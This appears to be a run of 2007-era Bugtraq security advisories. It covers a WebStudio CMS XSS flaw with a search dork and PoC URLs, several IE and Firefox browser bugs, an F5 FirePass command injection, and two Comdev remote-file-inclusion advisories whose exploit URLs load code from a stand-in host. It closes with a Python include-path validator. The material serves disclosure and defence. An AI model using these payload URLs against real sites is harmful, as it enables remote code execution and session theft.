This problem was corrected within 14 days, and a new SMTP server was provided on our web site. This was back in 2005; we are now almost TWO YEARS ON, and you still claim it is a problem. You **were** notified of the release of the fix, and we have many other confirmations that it is indeed a good fix. We are now at 4.7 of BusinessMail, and that also still blocks this "vulnerability", and yet you continue to publish out of date and inaccurate information as being the truth. Kindly update your published information as relevant to reflect the true facts of this buglet. You can download an evaluation BusinessMail system from our web site to test this for yourself if you still do not believe us. Thank You
WebStudio Multiple XSS Vulnerabilities
Application: WebStudio CMS
Vendor URL: http://www.bdigital.biz
Bug Type: Multiple URL Handling Remote Cross-Site Scripting Vulnerabilities
Exploitation: Remote
Severity: Less Critical
Solution Status: Unpatched

Introduction:
WebStudio CMS is a web-based CMS system.
Google Dork: "Powered by WebStudio"

Description:
User-supplied input passed via the URL is not properly sanitised before it is returned to the user in index.php?pageid=. This can be exploited to execute arbitrary script code in the security context of an affected website; as a result the code will be able to access any of the target user's cookies, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

PoC:
http://[target]/?pageid=[XSS]
http://[target]/?pageid=-->[XSS]
http://[target]/[EMAIL PROTECTED]
http://[target]/?pageid=http://[target]/?pageid=[XSS]
http://[target]/index.php?pageid=>'>[XSS]
http://[target]/index.php?pageid=[XSS]
http://[target]/index.php?pageid=-->[XSS]
http://[target]/index.php?pageid=http://[target]/index.php?pageid=[XSS]

Solution:
There was no vendor-supplied solution at the time of entry. Edit source code manually to ensure user-supplied input is correctly sanitised. Filter malicious characters and character sequences via an HTTP proxy or firewall with URL filtering capabilities.

Credits:
Glafkos Charalambous
glafkos (at) infosec (dot) org (dot) uk
Information Security Uncensored
InfoSEC.org.uk
Assorted browser vulnerabilities
Hello,

Will keep it brief. A couple of browser bugs, fresh from the oven, hand crafted with love:

1) Title: MSIE page update race condition (CRITICAL)
Impact: cookie stealing / setting, page hijacking, memory corruption
Demo: http://lcamtuf.coredump.cx/ierace/

...aka the bait & switch vulnerability. When Javascript code instructs MSIE6/7 to navigate away from a page that meets same-domain origin policy (and hence can be scriptually accessed and modified by the attacker) to an unrelated third-party site, there is a window of opportunity for concurrently executed Javascript to perform actions with the permissions for the old page, but actual content for the newly loaded page, for example:

- Read or set victim.document.cookie,
- Arbitrarily alter document DOM, including changing form submission URLs, injecting code,
- Read or write DOM structures that were not fully initialized, prompting memory corruption and browser crash.

This is tested on MSIE6 and MSIE7, fully patched.

2) Title: Firefox Cross-site IFRAME hijacking (MAJOR)
Impact: keyboard snooping, content spoofing, etc
Demo: http://lcamtuf.coredump.cx/ifsnatch/
Bugzilla: https://bugzilla.mozilla.org/show_bug.cgi?id=382686 [May 30]

Javascript can be used to inject malicious code, including key-snooping event handlers, on pages that rely on IFRAMEs to display contents or store state data / communicate with the server. This is related to a less severe variant independently reported by Ronen Zilberman two weeks earlier (bug 381300).

3) Title: Firefox file prompt delay bypass (MEDIUM)
Impact: non-consensual download or execution of files
Demo: http://lcamtuf.coredump.cx/ffclick2/
Bugzilla: https://bugzilla.mozilla.org/show_bug.cgi?id=376473 [Apr 04]

A sequence of blur/focus operations can be used to bypass delay timers implemented on certain Firefox confirmation dialogs, possibly enabling the attacker to download or run files without the user's knowledge or consent.

4) Title: MSIE6 URL bar spoofing (MEDIUM)
Impact: mimicking an arbitrary site, possibly including SSL data
Demo: http://lcamtuf.coredump.cx/ietrap2/

MSIE6 vulnerability, similar but unrelated to my earlier onUnload entrapment flaw, allows sites to spoof URL bar data. MSIE7 is not affected because of certain high-level changes in the browser.
S21Sec-035: F5 FirePass command execution vulnerability
## - S21Sec Advisory - ##

Title: F5 FirePass command execution vulnerability
ID: S21SEC-035-en
Severity: High - Intrusion
History: 14.Feb.2007 Vulnerability discovered
         22.Feb.2007 Vendor contacted
Scope: Linux's shell Command Execution
Platforms: Linux based Appliance
Author: Leonardo Nve ([EMAIL PROTECTED])
URL: http://www.s21sec.com/avisos/s21sec-035-en.txt
Release: Public

[ SUMMARY ]

F5's FirePass SSL VPN appliance provides secure access to corporate applications and data using a standard web browser. Delivering outstanding performance, scalability, ease-of-use, and end-point security, FirePass helps increase the productivity of those working from home or on the road while keeping corporate data secure.

FirePass provides:

* Automatic detection of security compliant systems, preventing infection.
* Automatic integration with the largest number of virus scanning and personal firewall solutions in the industry (over 100 different AV & Personal Firewall versions).
* Automatic protection from infected file uploads or email attachments.
* Automatic re-routing and quarantine of infected or non-compliant systems to a self remediation network - reducing help desk calls.
* A secure workspace, preventing eavesdropping and theft of sensitive data.
* Secure Login with a randomized key entry system, preventing keystroke logger snooping.
* Full integration with the FirePass Visual Policy Editor. This enables the creation of custom template policies based on the endpoints accessing your network and your company's security profile.

[ AFFECTED VERSIONS ]

This vulnerability has been tested in F5 FirePass 4100.

[ DESCRIPTION ]

S21sec has discovered a vulnerability in an F5 FirePass SSL VPN script that allows the injection of Linux shell commands under some circumstances. The attacker doesn't need to be logged in to the system in order to trigger the exploit.

The affected script is:
- my.activation.php3

The variable is:
- username

[ WORKAROUND ]

F5 has published a security advisory at https://tech.f5.com/home/solutions/sol167.html

Additionally, hotfix HF-75705-76003-1 has been issued for supported versions of FirePass. You may download this hotfix or later versions of the hotfix from the F5 Networks Downloads site (https://downloads.f5.com/esd/index.jsp).

[ ACKNOWLEDGMENTS ]

This vulnerability has been discovered and researched by:
- Leonardo Nve <[EMAIL PROTECTED]> S21Sec

With thanks to:
- Alberto Moro <[EMAIL PROTECTED]> S21Sec

[ REFERENCES ]

* F5 Firepass
  http://www.f5.com/products/FirePass/
* S21Sec
  http://www.s21sec.com
BCS'07 Call For Papers
Dear Bugtraq readers,

The call for papers and conference registration is now open for BCS'07, our third annual information security & hacking conference. From 30 to 31 October 2007, BCS'07 will be held at the Grand Melia in Jakarta, Indonesia.

We invite proposals for paper presentations and demonstrations. Your submission should include:

1. Name, title, address, email and phone number
2. Draft of the proposed presentation (in PDF, PowerPoint or Keynote format), proof of concept for tools and exploits, etc.
3. Short biography, qualification, occupation, achievement and affiliations (limit 150 words).
4. Summary or abstract for your presentation (limit 150 words)
5. Time (40-60 minutes). Include time for discussion and questions
6. Technical requirements (video, internet, wireless, audio, etc.)

We do not accept product, service or vendor related presentations.

Please send your proposal to [EMAIL PROTECTED] as soon as possible and no later than 30 June 2007. Proposals will be evaluated in the order received; submit early to maximise your chances of being selected.

Links: http://www.bellua.net or http://www.bellua.com/bcs/
Pictures from BCS2006: http://www.bellua.net/asia06.pictures/index.html
Pictures from BCS2005: http://www.bellua.net/asia05.pictures/index.html

Many thanks,
Jim Geovedi
Comdev eCommerce 4.1 RFI Vulnerability
###
#
# Comdev eCommerce 4.1 RFI Vulnerability
#
###
#
# Information:
#
# Scripts: Comdev eCommerce
# Download: http://www.comdevweb.com/downloadfile.php?product=ECOMM41&url=http://share.comdevweb.com/download/ecommerce-4.1.zip
# Version: 4.1
#
#
# Exploit:
#
# http://website/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=http://EVILSCRIPT.txt?
#
###
#
# Discovered By: [L.T.C]
#
###
Comdev Web Blogger 4.1 RFI Vulnerability
###
#
# Comdev Web Blogger 4.1 RFI Vulnerability
#
###
#
# Information:
#
# Scripts: Comdev Web Blogger
# Download: http://www.comdevweb.com/downloadfile.php?product=BLOGG41&url=http://share.comdevweb.com/download/blogger-4.1.zip
# Version: 4.1
#
#
# Exploit:
#
# http://website/oneadmin/blogger/sampleblogger.php?path[docroot]=http://EVILSCRIPT.txt?
#
###
#
# Discovered By: [L.T.C]
#
###
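Both Comdev advisories above show the same defect: a request parameter (path[docroot]) is used as the base of an include path, so a remote URL such as http://EVILSCRIPT.txt? is fetched and executed. The hardening any such script needs is shown below as an added example for this page, not Comdev code and not PHP: it treats a request-controlled path the way a safe include helper should, rejecting URL schemes and host parts, NUL bytes, and anything that resolves outside the application's own root. APP_ROOT is a placeholder.

```python
"""Validating a request-controlled include path, as an added example for the
path[docroot] RFI above. Not Comdev code; APP_ROOT is a placeholder."""
from pathlib import Path
from urllib.parse import urlsplit

APP_ROOT = Path("/var/www/app").resolve()  # placeholder document root


def resolve_include_path(user_value: str, root: Path = APP_ROOT) -> Path:
    """Map an untrusted value to a file under root, or raise ValueError.

    Rejects anything with a URL scheme or host part (http://EVILSCRIPT.txt?,
    //host/share/x), NUL bytes, and any path that resolves outside root."""
    parts = urlsplit(user_value)
    if parts.scheme or parts.netloc:
        raise ValueError("remote URL or network path rejected")
    if "\x00" in user_value:
        raise ValueError("NUL byte rejected")
    candidate = (root / user_value.lstrip("/")).resolve()
    try:
        candidate.relative_to(root)       # raises if candidate is not under root
    except ValueError:
        raise ValueError("path escapes the document root") from None
    return candidate


def is_safe_include(user_value: str) -> bool:
    """Boolean wrapper for quick checks of a request parameter."""
    try:
        resolve_include_path(user_value)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for v in ("includes/header.php", "http://EVILSCRIPT.txt?",
              "../../etc/passwd", "//evil.example/x.php"):
        print(f"{v!r:32} -> {is_safe_include(v)}")
```

In PHP itself the first line of defence against this vector is allow_url_include=Off (the default since PHP 5.2), but that only closes the remote case; the local traversal half of the check still matters, and the better fix is not to let a request parameter choose the include path at all.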